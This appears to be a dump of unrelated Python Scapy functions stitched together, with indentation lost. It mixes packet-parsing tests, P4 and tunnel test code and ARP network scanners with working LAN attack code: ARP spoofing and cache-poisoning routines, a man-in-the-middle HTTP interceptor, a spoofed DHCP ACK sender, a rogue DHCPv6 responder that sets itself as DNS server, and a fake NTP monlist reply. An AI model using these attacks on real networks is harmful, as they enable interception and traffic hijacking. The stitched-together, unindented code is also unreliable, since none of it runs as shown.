def testAll(dut):
""" test with eth+IPv4+TCP+Payload"""
fork(Clock(dut.clk, 6.4, 'ns').start())
dut._log.info("Running test")
dut.reset_n.value =0
dut.ethBus.value =0
dut.IPv4Bus.value =0
dut.payload_in_data.value =0
dut.tcpBus.value =0
yield ClockCycles(dut.clk, 10)
dut.reset_n.value =1
dut._log.info("end Rst")
dut.ethBus.value =int.from_bytes(raw(Ether(src="aa:aa:aa:aa:aa:aa",
dst='11:11:11:11:11:11',
type="IPv4")), 'little')
dut.IPv4Bus.value =int.from_bytes(raw(IP(src="192.168.1.1",
dst="192.168.1.2")), 'little')
dut.tcpBus.value =int.from_bytes(raw(TCP(sport=80, dport=12000)), 'little')
dut.payload_in_data.value =int(0xDEADBEEFDEADBEEF)
yield ClockCycles(dut.clk, 15)
yield ClockCycles(dut.clk, 1)
yield ClockCycles(dut.clk, 15)
dut._log.info("end Test")
def handle_pkt(pkt):
NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00\x01\x00\x24" + "\x00" * 64
if IP in pkt and UDP in pkt and pkt[IP].src != h2_ip:
src_mac = pkt[Ether].src
dst_mac = pkt[Ether].dst
src_ip = pkt[IP].src
dst_ip = pkt[IP].dst
proto = pkt[IP].proto
sport = pkt[UDP].sport
dport = pkt[UDP].dport
id_tup = (src_ip, dst_ip, proto, sport, dport)
if src_ip in VALID_IPS:
if id_tup not in totals:
totals[id_tup] = 0
totals[id_tup] += 1
print("Received from %s total: %s" % (id_tup, totals[id_tup]))
# Respond with random payload
p = Ether(dst=src_mac, src=dst_mac) / IP(dst=pkt[IP].src,
src=pkt[IP].dst)
p = p / UDP(dport=pkt[UDP].sport,
sport=123) / NTP(NTP_MONLIST_RESPONSE)
print p.show()
sendp(p, iface="eth0", loop=0)
def test_single_dns_resp_packet():
packets = [
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) /
DNS(rd=1,
qd=DNSQR(qtype="A", qname="google.com"),
an=DNSRR(rdata="123.0.0.1"))
]
events = list(packets_to_datasource_events(packets).events())
assert len(events) == 1
assert events[0]["src_mac"] == "ab:ab:ab:ab:ab:ab"
assert events[0]["dst_mac"] == "12:12:12:12:12:12"
assert events[0]["src_ip"] == "127.0.0.1"
assert events[0]["dst_ip"] == "192.168.1.1"
assert events[0]["sport"] == 80
assert events[0]["dport"] == 53
assert events[0]["qname"] == "google.com."
assert events[0]["qanswer"] == "123.0.0.1"
assert events[0]["qtype"] == "A"
assert events[0]["event_type"] == "DNS"
def test_single_http_packet():
packets = [
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) /
HTTP() /
HTTPRequest(Method="GET", Path="/foo", Host="https://google.com")
]
events = list(packets_to_datasource_events(packets).events())
assert len(events) == 1
assert events[0]["src_mac"] == "ab:ab:ab:ab:ab:ab"
assert events[0]["dst_mac"] == "12:12:12:12:12:12"
assert events[0]["src_ip"] == "127.0.0.1"
assert events[0]["dst_ip"] == "192.168.1.1"
assert events[0]["sport"] == 12345
assert events[0]["dport"] == 80
assert events[0]["http_method"] == "GET"
assert events[0]["uri"] == "/foo"
assert events[0]["http_dest"] == "https://google.com"
assert events[0]["event_type"] == "HTTPRequest"
def main():
src_ip = get_if_addr("eth0")
r = redis.Redis(unix_socket_path='/var/run/redis/redis.sock')
fmt = src_ip + "*"
key = r.keys(fmt)
dst_ip_list = []
for i in key:
dst_ip_list.append((str.split(i, "+"))[1])
dst_ip_list = set(dst_ip_list)
dst_ip = random.sample(dst_ip_list, 1)
fmt = src_ip + "+" + dst_ip[0] + "*"
key = r.keys(fmt)
route_info = random.sample(key, 1)
dst_ip, dst_mac, sr = get_route(route_info[0])
iface = get_if()
pkt = Ether(src=get_if_hwaddr(iface), dst=dst_mac, type=1792)
pkt = pkt / sr / '\x08\x00' / IP(dst=dst_ip) / UDP(
dport=1234, sport=random.randint(49152, 65535)) / "777777777"
pkt.show2()
sendp(pkt, iface=iface, verbose=False)
def scanner(bd, lan, periodo):
prox = time.time()
while True:
# creacion trama de capa 2 para broadcast con solicitud ARP
arp = ARP(pdst=lan)
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
paquete = ether / arp
# envio de paquetes en capa 2
resultado = srp(paquete, timeout=3, verbose=0)[0]
# actualizacion de estados
for enviado, recibido in resultado:
bd.actualizarAparicion(
recibido.hwsrc,
datetime.datetime.now()) # mac de conectado y timestamp actual
# hilo duerme hasta prox pasada
prox = prox + periodo
time.sleep(prox - time.time())
def send_thread(addr, iface):
global cwnd, currently_sent, lock, count_sent_packets
curr_seq_no = 1
counter = 1
while (count_sent_packets < 10000):
available_to_send = cwnd - currently_sent
for i in range(0, available_to_send):
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
message = randStr(N=10)
tcp_pkt = P4tcp(dstPort=1234,
srcPort=2345,
seqNo=curr_seq_no,
ackNo=1,
dataPayload=message)
pkt = pkt / IP(dst=addr, proto=P4TCP_PROTOCOL) / tcp_pkt
sendp(pkt, iface=iface, verbose=False)
print_packet(tcp_pkt)
curr_seq_no = curr_seq_no + PAYLOAD_LENGTH
counter = counter + 1
count_sent_packets = count_sent_packets + available_to_send
lock.acquire()
currently_sent = currently_sent + available_to_send
lock.release()
def netScanner(target_ip):
# targetip Address for the destination
# create ARP packet
arp = ARP(pdst=target_ip)
# create the Ether broadcast packet
# ff:ff:ff:ff:ff:ff MAC address indicates broadcasting
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
packet = ether / arp
result = srp(packet, timeout=3, verbose=0)[0]
# a list of clients
clients = []
for sent, received in result:
# for each response, append ip and mac address to `clients` list
clients.append({'ip': received.psrc, 'mac': received.hwsrc})
# print clients
print(FAIL + "\t\tAvailable Devices in the Network" + ENDC)
print("\t\t{1}--------------------------------{0}".format(ENDC, WARNING))
print("\t\t {1}IP{0}".format(ENDC, UNDERLINE) + " " * 18 +
"{1}MAC{0}".format(ENDC, UNDERLINE))
for client in clients:
print("\t\t{:16} {}".format(client['ip'], client['mac']))
def getFloodPacketList(self, pkt):
self.intfLock.acquire()
pktList = []
receiveIP = pkt[IP].src
for intf in self.pwospf_intfs:
for neighborIP in intf.neighbors.keys():
if (neighborIP == receiveIP): continue #TODO: Uncomment this
#TODO: Checksum is wrong
pktList.append(
Ether() / CPUMetadata(fromCpu=1, origEtherType=0x800) /
IP(src=intf.ip, dst=neighborIP, proto=89) /
Pwospf(type=4,
length=pkt[Pwospf].length,
routerId=pkt[Pwospf].routerId,
areaId=pkt[Pwospf].areaId,
checksum=0) / LSU(seq=pkt[LSU].seq,
ttl=pkt[LSU].ttl,
lsuAdList=pkt[LSU].lsuAdList))
self.intfLock.release()
if not pktList:
return None
return copy.deepcopy(pktList)
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
# Function for sending the malicious ARP packets out with the specified data
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
packet = ether / arp
sendp(x=packet, verbose=False)
def main(argv):
try:
opts, args = getopt.getopt(sys.argv[1:],'s:e:',['start=','end='])
except getopt.GetoptError:
sys.exit(2)
for opt, arg in opts:
if opt =='-s':
start = int(arg)
elif opt =='-e':
end = int(arg)
if start == '':
sys.exit()
if end == '':
sys.exit()
interface = popen('ifconfig | awk \'/eth0/ {print $1}\'').read()
ip_dst = gendest(start, end)
ip_src = sourceIPgen()
udp_packets = Ether()/IP(dst=ip_dst, src=ip_src,ttl=18)/UDP(dport=80,sport=2)
sendp(udp_packets, iface=interface.rstrip(), inter=0.05)
print(repr(udp_packets))
def interceptor(p):
"""handler of intercepted packets"""
# APR packet
if p.haslayer(ARP) and p[ARP].op == 1:
self._poison_client_arp_cache()
# TCP/HTTP handshake (SYN) packet
elif p.haslayer(TCP) and str(p[TCP].flags) == "S" and \
p[IP].src == self.client_ip and p[IP].dst == self.http_ip:
self._mitm_tcp_handshake(p)
# HTTP Request packet
elif p.haslayer(TCP) and p.haslayer(HTTPRequest):
self._mitm_http_req(p)
# FIN (connection teardown)
elif p.haslayer(TCP) and str(p[TCP].flags) == "FA":
self._poison_client_arp_cache(verbose=False)
l2_l3 = Ether(src=self.attacker_mac, dst=self.client_mac) / \
IP(src=self.http_ip, dst=self.client_ip)
ack = TCP(dport=p[TCP].sport,
sport=p[TCP].dport,
flags="A",
seq=p.ack,
ack=p.seq + 1)
sendp(l2_l3 / ack, verbose=False)
def host_scanner():
"""With scapy, return all online hosts."""
online_strangers = {}
collection = []
try:
ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip_range),
retry=scan_retries,
timeout=scan_timeout)
except PermissionError:
print('Please run with elevated permissions.')
sys.exit(1)
for snd, rcv in ans:
result = rcv.sprintf(r'%ARP.psrc% %Ether.src%').split()
collection.append(result)
for host in collection:
ip, mac = tuple(host)
if mac not in whitelist_dict.keys():
# UNKNOWN is a remnant of returned arp-scan values, left in for future enhancements
online_strangers[mac] = {'name': 'UNKNOWN', 'ip': ip}
return online_strangers
def pkt_callback(pkt):
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 8:
ssid = pkt.info
try:
extra = pkt.notdecoded
rssi = -(256 - ord(extra[-4:-3]))
except:
rssi = 0
addr = "10.0.3.3"
iface = get_if(sys.argv[1])
if int(rssi) > -70:
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / IP(dst=addr) / \
TCP(dport=1234, sport=random.randint(49152, 65535)) \
/ P4wifi(rssi=abs(rssi))
pkt.show()
sendp(pkt, iface=iface, verbose=False)
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
def broadcastPacket():
packet = ether / arp
sendp(x=packet, verbose=False)
broadcastPacket()
def followUpPkt():
#lastPktTime = time.time_ns()
lastPktTime = int(round(time.time() * 1000 * 1000 * 1000)) #accurate rate : naro second(10^-9)
DPSync = DPSyncTag(
etherType = 0x9487,
opCode = 0b0001,
reserved = 0,
originalPort = 0
)
TS = TS_Payload(
TS1 = lastPktTime,
TS2 = 0,
TS3 = 0,
TS4 = 0
)
pkt = Ether(src=get_if_hwaddr(iface), type=0x9487, dst='ff:ff:ff:ff:ff:ff')
pkt =pkt / IP(dst=addr) / DPSync / TS
pkt.show()
hexdump(pkt)
sendp(pkt, iface=iface, verbose=False)
def main(args, proto, host):
"""Main fn"""
# Currently we work with directly connected subnets
for net, mask, gwy, iface, saddr in conf.route.routes:
if atol(host.addr) & mask == net and gwy == '0.0.0.0':
# ARP ping the IP to find the dst.MAC
arpres = srp1(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=host.addr),
iface=iface,
verbose=0,
timeout=0.1,
retry=10)
if arpres is None:
print 'Host {} is not yet up. Retry later'.format(host.addr)
return
rewriteinfo = (proto, iface, get_if_hwaddr(iface),
arpres[Ether].src, saddr, host.addr)
send_pkts(args, rewriteinfo)
return
print 'Host {} does not belong to directly conencted subnet'.format(
host.addr)
def test_03_icmp_echo_request(self):
test_packet = Ether() / IPv6(
src='fd91:79d3:d621::1234',
dst='fdb4:98ce:52d4::42') / ICMPv6EchoRequest()
self.sendp(test_packet, iface=self.IFACE_NAME_PY)
packet = self.wait_for_packet(
self.eth_tx, lambda packet: isinstance(packet.payload, IP) and
packet.payload.dst == '5.6.7.8')
assert isinstance(packet, Ether)
assert_equals(packet.dst, self.py_side_mac)
fou_ip = packet.payload
assert isinstance(fou_ip, IP) # Expecting an IP packet
assert_equals(fou_ip.src, '65.65.65.65')
assert_equals(fou_ip.dst, '5.6.7.8')
fou_udp = fou_ip.payload
assert isinstance(fou_udp, UDP) # Expecting a FOU packet
assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT)
glb_gue = fou_udp.payload
assert isinstance(
glb_gue,
GLBGUE) # Expecting a GUE packet (scapy will always map this)
assert_equals(glb_gue.private_data[0].hop_count, 1)
assert_equals(glb_gue.private_data[0].next_hop, 0)
assert_equals(glb_gue.private_data[0].hops, ['6.7.8.9'])
inner_ip = glb_gue.payload
assert isinstance(inner_ip, IPv6) # Expecting the inner IP packet
assert_equals(inner_ip.src, 'fd91:79d3:d621::1234')
assert_equals(inner_ip.dst, 'fdb4:98ce:52d4::42')
inner_tcp = inner_ip.payload
assert isinstance(inner_tcp,
ICMPv6EchoRequest) # Expecting the inner ICMP packet
def scan():
try:
print(colors.purple + "Interfaces:" + colors.end)
for iface in netifaces.interfaces():
print(colors.yellow + iface + colors.end)
interface = input(colors.purple + "Interface: " +
colors.end).strip(" ")
try:
ip = netifaces.ifaddresses(interface)[2][0]['addr']
except (ValueError, KeyError):
printError("Invalid interface!")
return
ips = ip + "/24"
printInfo("Scanning...")
start_time = datetime.now()
conf.verb = 0
try:
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ips),
timeout=2,
iface=interface,
inter=0.1)
except PermissionError:
printError('Permission denied!')
return
for snd, rcv in ans:
print(
rcv.sprintf(colors.yellow + "r%Ether.src% - %ARP.psrc%" +
colors.end))
stop_time = datetime.now()
total_time = stop_time - start_time
printSuccess("Scan completed!")
printSuccess("Scan duration: " + str(total_time))
except KeyboardInterrupt:
printInfo("Network scanner terminated!")
def scan_network(filename, index, print_results=False, load_to_elastic=True):
current_time = datetime.datetime.utcnow().isoformat()
print("Starting at "+ current_time)
print("scanning....")
clientname = ([l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2]
if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)),
s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET,
socket.SOCK_DGRAM)]][0][1]]) if l][0][0])
target_ip = (clientname+"/24")
domain = get_domain(clientname)
arp = ARP(pdst=target_ip)
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
packet = ether/arp
result = srp(packet, timeout=3, verbose=0)[0]
clients = []
for sent, received in result:
client = {'@timestamp': current_time,
'client' : {
'ip': received.psrc,
'mac': received.hwsrc,
'name': socket.getfqdn(received.psrc),
'domain' : domain
}
}
clients.append(client)
if print_results:
print("IP" + " "*18 +"MAC" + " "*19 + "Host Name")
for client in clients:
print("{:16} {} {}".format(client['client']['ip'], client['client']['mac'], client['client']['name']))
if load_to_elastic:
send_to_elastic(clients, filename, index)
print('Scan Complete')
def main():
if len(sys.argv) < 2:
print 'pass 2 arguments: <destination>'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "sending on interface %s to %s" % (iface, str(addr))
while True:
print
s = str(raw_input('Define Message Type: 3(PUB), 8(SUB), 10(UNSUB) '))
if s == "q":
break
print
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
try:
pkt = pkt / MQTT(message_type=int(s), DUP=0, QoS=0, R=0)
except ValueError as e:
print '[MQTT]' + e
pass
s = str(raw_input('Define Topic Type: 0~2^16-1 '))
if s == "q":
break
print
try:
pkt = pkt / Topic(topic=int(s), debug=int(0))
except ValueError as e:
print '[Topic]' + e
pass
pkt = pkt / IP(dst=addr) / TCP(dport=4321, sport=1234)
pkt.show2()
sendp(pkt, iface=iface, verbose=True)
def test_01_route_classified_v4(self):
test_packet = Ether(
dst='56:0e:37:46:a2:21', src='b6:59:5f:11:c1:2a') / IP(
src="10.11.12.13", dst="1.1.1.1") / TCP(sport=45678, dport=80)
self.sendp(test_packet, iface=self.IFACE_NAME_PY)
packet = self.wait_for_packet(
self.eth_tx, lambda packet: isinstance(packet.payload, IP) and
packet.payload.dst == '3.4.5.6')
assert isinstance(packet, Ether)
assert_equals(packet.dst, self.py_side_mac)
fou_ip = packet.payload
assert isinstance(fou_ip, IP) # Expecting an IP packet
assert_equals(fou_ip.src, '65.65.65.65')
assert_equals(fou_ip.dst, '3.4.5.6')
fou_udp = fou_ip.payload
assert isinstance(fou_udp, UDP) # Expecting a FOU packet
assert_equals(fou_udp.sport, self.sport_for_packet(test_packet))
assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT)
glb_gue = fou_udp.payload
assert isinstance(
glb_gue,
GLBGUE) # Expecting a GUE packet (scapy will always map this)
assert_equals(glb_gue.private_data[0].hop_count, 1)
assert_equals(glb_gue.private_data[0].next_hop, 0)
assert_equals(glb_gue.private_data[0].hops, ['2.3.4.5'])
inner_ip = glb_gue.payload
assert isinstance(inner_ip, IP) # Expecting the inner IP packet
assert_equals(inner_ip.dst, '1.1.1.1')
inner_tcp = inner_ip.payload
assert isinstance(inner_tcp, TCP) # Expecting the inner TCP packet
assert_equals(inner_tcp.dport, 80)
def test_03_icmp_echo_request(self):
test_packet = Ether() / IP(src="10.11.12.13", dst="1.1.1.1") / ICMP(
type=8, code=0)
self.sendp(test_packet, iface=self.IFACE_NAME_PY)
packet = self.wait_for_packet(
self.eth_tx, lambda packet: isinstance(packet.payload, IP) and
packet.payload.dst == '3.4.5.6')
assert isinstance(packet, Ether)
assert_equals(packet.dst, self.py_side_mac)
fou_ip = packet.payload
assert isinstance(fou_ip, IP) # Expecting an IP packet
assert_equals(fou_ip.src, '65.65.65.65')
assert_equals(fou_ip.dst, '3.4.5.6')
fou_udp = fou_ip.payload
assert isinstance(fou_udp, UDP) # Expecting a FOU packet
assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT)
glb_gue = fou_udp.payload
assert isinstance(
glb_gue,
GLBGUE) # Expecting a GUE packet (scapy will always map this)
assert_equals(glb_gue.private_data[0].hop_count, 1)
assert_equals(glb_gue.private_data[0].next_hop, 0)
assert_equals(glb_gue.private_data[0].hops, ['2.3.4.5'])
inner_ip = glb_gue.payload
assert isinstance(inner_ip, IP) # Expecting the inner IP packet
assert_equals(inner_ip.src, '10.11.12.13')
assert_equals(inner_ip.dst, '1.1.1.1')
inner_tcp = inner_ip.payload
assert isinstance(inner_tcp, ICMP) # Expecting the inner ICMP packet
assert_equals(inner_tcp.type, 8)
assert_equals(inner_tcp.code, 0)
def test_01_route_classified_v6(self):
test_packet = Ether() / IPv6(src='fd91:79d3:d621::1234',
dst='fdb4:98ce:52d4::42') / TCP(
sport=45678, dport=80)
self.sendp(test_packet, iface=self.IFACE_NAME_PY)
packet = self.wait_for_packet(
self.eth_tx, lambda packet: isinstance(
packet.payload, IP) and isinstance(packet.payload.payload, UDP)
and packet.payload.payload.dport == self.DIRECTOR_GUE_PORT)
fou_ip = packet.payload
assert isinstance(fou_ip, IP) # Expecting an IP packet
assert_equals(fou_ip.src, '65.65.65.65')
assert_equals(fou_ip.dst, '5.6.7.8')
fou_udp = fou_ip.payload
assert isinstance(fou_udp, UDP) # Expecting a FOU packet
assert_equals(fou_udp.sport, self.sport_for_packet(test_packet))
assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT)
glb_gue = fou_udp.payload
assert isinstance(
glb_gue,
GLBGUE) # Expecting a GUE packet (scapy will always map this)
assert_equals(glb_gue.private_data[0].hop_count, 1)
assert_equals(glb_gue.private_data[0].next_hop, 0)
assert_equals(glb_gue.private_data[0].hops, ['6.7.8.9'])
inner_ip = glb_gue.payload
print repr(inner_ip)
assert isinstance(inner_ip, IPv6) # Expecting the inner IPv6 packet
assert_equals(inner_ip.src, 'fd91:79d3:d621::1234')
assert_equals(inner_ip.dst, 'fdb4:98ce:52d4::42')
inner_tcp = inner_ip.payload
assert isinstance(inner_tcp, TCP) # Expecting the inner TCP packet
assert_equals(inner_tcp.dport, 80)
def run(self):
debug('ARP cache poisoning thread waiting for victims...')
ip = q.get()
debug('Acquired first victim... %s' % ip)
pe = Ether(src=self.mac, dst=self.rmac)
pa = ARP(op='who-has',
hwsrc=self.mac,
psrc=ip,
pdst=ip,
hwdst=self.rmac)
oldmac = self.whohas(ip)
oldip = ip
while True:
try:
ip = q.get_nowait()
if oldmac is not None:
debug('Healing victim %s/%s' % (oldip, oldmac))
pa.psrc = oldip
pa.hwsrc = oldmac
sendp(pe / pa, verbose=0)
if ip is None:
break
else:
debug('Changing victim to %s...' % ip)
pa.psrc = ip
pa.hwsrc = self.mac
oldip = ip
oldmac = self.whohas(ip)
except Empty:
# Send the poison... all your base are belong to us!
debug('Poisoning %s...' % ip)
sendp(pe / pa, verbose=0)
sleep(1 / self.poison_rate)
def handle_packet(packet):
eth = packet.getlayer(Ether)
ip = packet.getlayer(IP)
udp = packet.getlayer(UDP)
bootp = packet.getlayer(BOOTP)
dhcp = packet.getlayer(DHCP)
dhcp_message_type = None
if not dhcp:
return False
for opt in dhcp.options:
if opt[0] == "message-type":
dhcp_message_type = opt[1]
# dhcp request
if dhcp_message_type == 3:
client_ip = client_net + str(random.randint(2,254))
dhcp_ack = Ether(src=eth.dst, dst=eth.src) / \
IP(src=dhcpserver, dst=client_ip) / \
UDP(sport=udp.dport,
dport=udp.sport) / \
BOOTP(op=2,
chaddr=eth.dst,
siaddr=gateway,
yiaddr=client_ip,
xid=bootp.xid) / \
DHCP(options=[('message-type', 5),
('requested_addr', client_ip),
('subnet_mask', '255.255.255.0'),
('router', gateway),
('name_server', nameserver),
('end')])
print("Send spoofed DHCP ACK to %s" % ip.src)
sendp(dhcp_ack, iface=dev)
def test_01_ip_range_match_v6(self):
for i in [0, 1, 10, 50, 62, 63]: # fdb4:98ce:52d4::4240/122
dst_ip = "fdb4:98ce:52d4::42%02x" % (64 + i)
test_packet = Ether() / IPv6(src="fd91:79d3:d621::1234",
dst=dst_ip) / TCP(sport=45678,
dport=80)
self.sendp(test_packet, iface=self.IFACE_NAME_PY)
packet = self.wait_for_packet(
self.eth_tx, lambda packet: isinstance(packet.payload, IP) and
packet.payload.dst == '4.5.6.7')
assert isinstance(packet, Ether)
assert_equals(packet.dst, self.py_side_mac)
fou_ip = packet.payload
assert isinstance(fou_ip, IP) # Expecting an IP packet
assert_equals(fou_ip.src, '65.65.65.65')
assert_equals(fou_ip.dst, '4.5.6.7')
fou_udp = fou_ip.payload
assert isinstance(fou_udp, UDP) # Expecting a FOU packet
assert_equals(fou_udp.sport, self.sport_for_packet(test_packet))
assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT)
glb_gue = fou_udp.payload
assert isinstance(
glb_gue,
GLBGUE) # Expecting a GUE packet (scapy will always map this)
inner_ip = glb_gue.payload
assert isinstance(inner_ip, IPv6) # Expecting the inner IP packet
assert_equals(inner_ip.dst, dst_ip)
inner_tcp = inner_ip.payload
assert isinstance(inner_tcp, TCP) # Expecting the inner TCP packet
assert_equals(inner_tcp.dport, 80)
def main():
if len(sys.argv) < 3:
print 'pass 2 arguments: <destination> "<message>"'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "sending on interface %s to %s" % (iface, str(addr))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / IP(dst=addr, options=IPOption_DRIP(
count=0, swtraces=[])) / UDP(
dport=4321,
sport=1234) / sys.argv[2] #random.randint(49152,65535) for sport
pkt.show2()
#Wrap this in a repeated loop for how long the timer indicates
try:
for i in range(int(sys.argv[3])):
sendp(pkt, iface=iface)
sleep(1)
except KeyboardInterrupt:
raise
def main():
if len(sys.argv) < 4:
print 'pass 3 arguments: <op> <keyhash> "<message>" (node, load)'
exit(1)
op = int(sys.argv[1])
keyhash = int(sys.argv[2])
msg = sys.argv[3]
node = 0
load = 0
if len(sys.argv) >= 6:
node = int(sys.argv[4])
load = int(sys.argv[5])
dst_ip = server_ip
src_ip = client_ip
pkt = Ether(src=client_mac, dst=server_mac)
pkt = pkt / IP(dst=dst_ip, src=src_ip)
pkt = pkt / UDP(dport=12345, sport=random.randint(49152, 65535))
pkt = pkt / Pegasus(op=op, keyhash=keyhash, node=node, load=load)
pkt = pkt / msg
pkt.show2()
sendp(pkt, iface=client_iface, verbose=False)
def send_dhcp_reply(p, basep):
resp = Ether(dst=basep.src) / IPv6(src=config.selfaddr,
dst=basep[IPv6].src) / UDP(
sport=547, dport=546) #base packet
resp /= DHCP6_Reply(trid=p.trid)
#resp /= DHCP6OptPref(prefval = 255)
resp /= DHCP6OptClientId(duid=p[DHCP6OptClientId].duid)
resp /= DHCP6OptServerId(duid=config.selfduid)
resp /= DHCP6OptDNSServers(dnsservers=[config.selfaddr])
if config.localdomain:
resp /= DHCP6OptDNSDomains(dnsdomains=[config.localdomain])
try:
opt = p[DHCP6OptIAAddress]
resp /= DHCP6OptIA_NA(ianaopts=[opt],
T1=200,
T2=250,
iaid=p[DHCP6OptIA_NA].iaid)
sendp(resp, iface=config.default_if, verbose=False)
except IndexError:
# Some hosts don't send back this layer for some reason, ignore those
if config.debug or config.verbose:
print(
'Ignoring DHCPv6 packet from %s: Missing DHCP6OptIAAddress layer'
% basep.src)
